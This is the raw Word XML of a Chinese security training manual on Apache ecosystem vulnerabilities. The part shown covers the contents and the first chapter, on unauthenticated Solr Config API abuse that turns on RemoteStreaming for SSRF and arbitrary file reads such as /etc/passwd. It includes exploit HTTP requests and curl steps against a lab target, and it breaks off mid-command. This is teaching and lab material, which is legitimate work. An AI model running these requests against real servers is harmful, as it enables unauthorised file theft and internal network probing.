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4065B" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943"/>
    <w:p w14:paraId="7C148F65" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943"/>
    <w:p w14:paraId="3BCE1AB1" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943"/>
    <w:p w14:paraId="6CE2BBA9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943"/>
    <w:p w14:paraId="5146278C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943"/>
    <w:p w14:paraId="0B680818" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943"/>
    <w:p w14:paraId="310B3937" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="72"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Apache 生态漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169ECB2D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="56"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实 训 手 册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E528CE" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465B4E29" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D2673E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DCF8207" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBC0B7A" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>—— 含</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码级</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="楷体" w:eastAsia="楷体" w:hAnsi="楷体"/>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞成因深度剖析 ——</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511255C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD2EC53" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC104F2" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE774C2" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C76FCD6" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BCE66B9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78479DE5" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2026年8月</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E816076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745E7BE3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>言</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C39864" w14:textId="7339C80A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本手册围绕Apache软件基金会旗下多款主流中间件与开源组件的典型安全漏洞展开，涵盖搜索服务、安全框架、消息队列、数据库管理、大数据处理、日志组件及Web服务器等多个技术领域。每个漏洞均按照"漏洞概述</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>—影响</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>版本—</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码级</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成因剖析—实验环境—复现步骤—修复建议"的结构进行系统化梳理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BA27F1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与常规漏洞复现文档不同，本手册的核心特色在于对每个漏洞的成因进行了</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码级</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的深度剖析。通过追踪关键类、核心方法与调用链，揭示漏洞从"输入点"到"触发点"的完整路径，帮助读者不仅知其然，更知其所以然。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619B2CCE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本手册适用于网络空间安全、信息安全与管理等专业的实训教学，也可供</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>安全运</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>维人员、渗透测试工程师及漏洞研究人员参考。所有实验均建议在隔离的实验环境中进行，严禁用于非法用途。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1912B607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7DDDE030" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>目</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>录</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="43EE93BD" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第一章  Apache Solr RemoteStreaming 文件读取与SSRF漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A68EB4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第二章  Apache Shiro 认证绕过漏洞（CVE-2020-1957）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD6F73" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第三章  Apache RocketMQ 远程命令执行漏洞（CVE-2023-33246）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10696360" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第四章  pgAdmin 无授权远程命令执行漏洞（CVE-2022-4223）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36161020" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第五章  Apache ActiveMQ OpenWire协议反序列化RCE（CVE-2023-46604）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07756296" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第六章  Apache Kafka JNDI注入漏洞（CVE-2023-25194）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D53C87E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第七章  Apache OfBiz 反序列化命令执行漏洞（CVE-2023-49070）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F65DC" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第八章  Apache Druid 嵌入式JavaScript RCE（CVE-2021-25646）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65338BD3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第九章  Apache Log4j Server 反序列化RCE（CVE-2017-5645）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058814DE" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>第十章  Apache HTTP Server mod_proxy SSRF（CVE-2021-40438）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50953BC0" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="082209F2" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第一章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Apache Solr RemoteStreaming </w:t>
      </w:r>
      <w:r>
        <w:t>文件读取与</w:t>
      </w:r>
      <w:r>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE4508C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF2D735" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Solr是Apache基金会旗下的开源企业级搜索服务器，基于Lucene构建，广泛应用于全文检索、日志分析与数据聚合场景。在未开启身份认证的情况下，攻击者可通过Solr的Config API动态修改Core配置，开启RemoteStreaming（远程流）功能，进而利用stream.url参数发起服务端请求伪造（SSRF）或读取服务器任意文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68370FFA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 xml:space="preserve">该漏洞本质上是"配置可被未授权修改"与"远程流功能支持多协议URL"两个设计缺陷的组合利用。对应CVE编号为CVE-2021-27905，影响Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;= 8.8.1的全版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236CD040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1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DE658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 xml:space="preserve">Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;= 8.8.1（全版本受影响，前提是未启用认证且Config API可访问）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FA6F33" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>代码级成因剖析</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A88B7F7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）配置动态修改入口：Config API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0660A9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Solr提供了一套RESTful风格的Config API，允许通过HTTP POST请求动态修改指定Core的运行时配置。其核心处理类为SolrConfigHandler，该类会解析请求体中的JSON指令，并调用set-property动作将配置项写入内存中的SolrConfig对象。关键调用链如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B71CBE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POST /solr/{core_name}/config HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: application/json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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "set-property": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "requestDispatcher.requestParsers.enableRemoteStreaming": true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D68DB3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>在SolrConfigHandler的handlePOST()方法中，会遍历commands数组，对每个"set-property"指令调用config.setProperty()方法。该方法直接将用户传入的键值对合并到配置对象中，未对配置项名称做任何白名单校验——这意味着攻击者可以修改任意配置项，包括安全相关的开关。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A06DC6C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（2）远程流功能的协议支持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7443179D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>当enableRemoteStreaming被设置为true后，Solr的RequestDispacher会在解析请求时识别stream.url参数。该参数由ContentStreamBase类处理，其核心逻辑是通过Java的URL.openConnection</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>()打开用户指定的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>URL连接，并将返回的数据流作为Solr的输入内容流。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEDCFF4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lastRenderedPageBreak/>
        <w:t>// SolrContentStreamBase 中的关键逻辑（简化示意）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>if (streamUrl != null) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    URL url = new URL(streamUrl);  // 直接使用用户传入的URL，无协议白名单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    URLConnection conn = url.openConnection();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    InputStream is = conn.getInputStream();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    contentStreams.add(new ContentStreamBase(is, ...));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FAF76" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>由于Java的URL类默认支持file://、http://、https://、ftp://等多种协议，且Solr未对协议类型做限制，攻击者可以：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B2A51" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>① 使用file://协议读取服务器本地任意文件（如/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/passwd）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D634735" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>② 使用http://协议访问内网服务，形成SSRF；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF97AA" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>③ 结合jar://协议向服务器写入临时文件，进一步组合利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5A45AE" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（3）漏洞根因总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152FCD80" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>该漏洞的根本原因有二：其一，Config API在未认证情况下可被任意访问，且set-property操作缺乏配置项白名单机制；其二，RemoteStreaming功能在设计上支持多协议URL，但未对协议类型和目标地址做安全限制。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>两者结合，使得攻击者可以"先开开关，再用功能"，最终实现未授权文件读取与SSRF。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB5E32" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>实验环境</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="118994EF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>靶机：Vulhub Apache Solr 8.1.1（Docker环境），监听端口8983</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66235676" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>攻击机：Kali Linux，安装curl、Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B8CB33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网络：攻击机与靶机在同一局域网，靶机IP假设为192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705857AA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1.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08280395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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：获取Core名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021E111F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访问</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后台的Cores信息接口，获取当前存在的Core名称（本例中为demo）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56838942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"http://192.168.1.100:8983/solr/admin/cores?indexInfo=false&amp;wt=json"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F358F42" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>返回JSON中的status字段下的键名即为Core名称，如"demo"。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C59F23" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤二：开启RemoteStreaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C76B21D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>向Config API发送POST请求，将enableRemoteStreaming设置为true：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C0FC6" w14:textId="47D3B569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-i -s -k -</w:t>
      </w:r>
      <w:r w:rsidR="0025625B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0025625B">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidR="0025625B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
